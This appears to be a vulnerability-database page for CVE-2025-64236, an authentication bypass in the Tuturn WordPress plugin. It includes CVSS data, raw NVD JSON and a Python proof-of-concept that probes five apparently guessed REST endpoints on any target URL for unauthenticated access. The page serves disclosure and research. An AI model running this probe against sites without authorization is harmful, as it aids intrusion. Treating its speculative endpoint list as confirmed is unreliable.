Security Vulnerability Report
中文
CVE-2025-64236 CVSS 9.8 CRITICAL

CVE-2025-64236

Published: 2025-12-18 17:15:55
Last Modified: 2026-04-28 19:35:17

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Tuturn allows Authentication Abuse.This issue affects Tuturn: from n/a before 3.6.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AmentoTech Tuturn < 3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64236 PoC - Authentication Bypass in Tuturn WordPress Plugin # This PoC demonstrates the authentication bypass vulnerability import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64236 """ # Target endpoint that may bypass authentication endpoints = [ '/wp-json/tuturn/v1/user/profile', '/wp-json/tuturn/v1/admin/settings', '/wp-json/tuturn/v1/auth/login', '/wp-json/tuturn/v1/bookings/create', '/wp-json/tuturn/v1/payments/process' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-64236 - Tuturn Authentication Bypass\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request to potential bypass endpoint headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if response indicates successful bypass if response.status_code == 200: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response: {response.text[:200]}...") elif response.status_code == 401: print(f"[-] Protected: {url}") else: print(f"[?] Unknown: {url} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {str(e)}") print("\n[*] Note: This is a basic PoC. Full exploitation requires identifying specific bypass path.") print("[*] Reference: https://patchstack.com/database/wordpress/plugin/tuturn/vulnerability/wordpress-tuturn-plugin-3-6-broken-authentication-vulnerability") if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64236", "sourceIdentifier": "[email protected]", "published": "2025-12-18T17:15:55.477", "lastModified": "2026-04-28T19:35:16.930", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Tuturn allows Authentication Abuse.This issue affects Tuturn: from n/a before 3.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/tuturn/vulnerability/wordpress-tuturn-plugin-3-6-broken-authentication-vulnerability?_s_id=cve", "source": "[email protected]"}]}}